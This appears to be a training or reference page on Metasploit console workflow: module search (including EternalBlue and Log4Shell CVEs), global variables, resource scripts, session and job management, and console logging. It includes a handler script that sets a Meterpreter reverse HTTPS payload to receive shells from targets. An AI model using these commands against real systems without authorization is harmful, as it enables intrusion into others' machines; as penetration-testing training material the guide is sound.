Console & Workflow
Starting msfconsoleβ
# Standard launch
msfconsole
# Quiet launch (suppress banner - faster, cleaner)
msfconsole -q
# Launch and run a resource script on startup
msfconsole -q -r /opt/msf_scripts/handler.rc
Searchβ
The search command queries the module database. Knowing the right filters saves time.
# Search by name keyword
msf6 > search eternalblue
msf6 > search ms17_010
# Search by type
msf6 > search type:exploit platform:windows smb
msf6 > search type:auxiliary name:smb_login
# Search by CVE
msf6 > search cve:2021-44228
# Search by rank (only reliable/excellent exploits)
msf6 > search type:exploit rank:excellent platform:windows
Module ranks: manual β low β average β normal β good β great β excellent. Stick to great or better for CTE unless a specific module requires otherwise.
Module Infoβ
Always run info before using an unfamiliar module. Shows options, payload compatibility, references, and reliability notes.
msf6 > info exploit/windows/smb/ms17_010_eternalblue
msf6 > info auxiliary/scanner/smb/smb_ms17_010
Global Variables (setg)β
setg sets a variable globally - it persists across all modules in the current session. Saves re-typing LHOST, LPORT, and RHOSTS every time you switch modules.
# Set global listener address (your Kali IP)
msf6 > setg LHOST <KALI_IP>
msf6 > setg LPORT 443
# Set global target
msf6 > setg RHOSTS <TARGET_IP>
# Verify what's set globally
msf6 > get LHOST
msf6 > get LPORT
# Clear a global variable
msf6 > unsetg LHOST
# See all current variable values
msf6 > show options # (inside a module) - shows global + module-local values
Run setg LHOST <KALI_IP> as soon as you launch msfconsole. Every module that needs a callback address will pick it up automatically.
Resource Scriptsβ
Resource scripts (.rc files) are plain text files with msfconsole commands - one per line. Use them to automate repetitive setup (handler startup, workspace init, scan imports).
Example: Persistent Handler Scriptβ
# /opt/msf_scripts/handler_443.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_https
set LHOST <KALI_IP>
set LPORT 443
set ExitOnSession false
exploit -j
# Load at startup
msfconsole -q -r /opt/msf_scripts/handler_443.rc
# Or load from inside msfconsole
msf6 > resource /opt/msf_scripts/handler_443.rc
Example: Workspace Init Scriptβ
# /opt/msf_scripts/init_workspace.rc
db_status
workspace -a 262COS_MSNNAME
setg LHOST <KALI_IP>
setg LPORT 443
Session Management Basicsβ
# List all active sessions
msf6 > sessions
# Interact with a session
msf6 > sessions -i <ID>
# Background the current session (from inside Meterpreter)
meterpreter > background
# Kill a session
msf6 > sessions -k <ID>
# Kill all sessions
msf6 > sessions -K
# Run a command against all sessions
msf6 > sessions -c "sysinfo" -i 1,2,3
Job Managementβ
Exploits run with -j become background jobs, allowing multiple listeners/exploits simultaneously.
# List running jobs
msf6 > jobs
# Kill a job
msf6 > jobs -k <ID>
# Kill all jobs
msf6 > jobs -K
Console Navigation Tipsβ
# Go back to root from inside a module
msf6 (exploit/...) > back
# Reuse the last module
msf6 > previous
# Tab completion works on module names, options, and file paths
# History search (same as bash)
# Ctrl+R - reverse search through command history
# Show recently used modules
msf6 > previous
# Reload a specific module (after editing it)
msf6 > reload_all
Useful Global Settingsβ
Set these once per session:
msf6 > setg LHOST <KALI_IP>
msf6 > setg LPORT 443
msf6 > setg ConsoleLogging true # Log console output to file
msf6 > setg LogLevel 1 # 0=off, 1=errors, 2=info, 3=debug
Enable Console Loggingβ
msf6 > spool /opt/msf_logs/msn_YYYYMMDD.log
All console output (commands + results) writes to the file. Essential for mission documentation and AAR reconstruction.
Run spool /opt/msf_logs/<FILENAME>.log immediately after workspace init. It's the closest thing MSF has to automatic mission logging.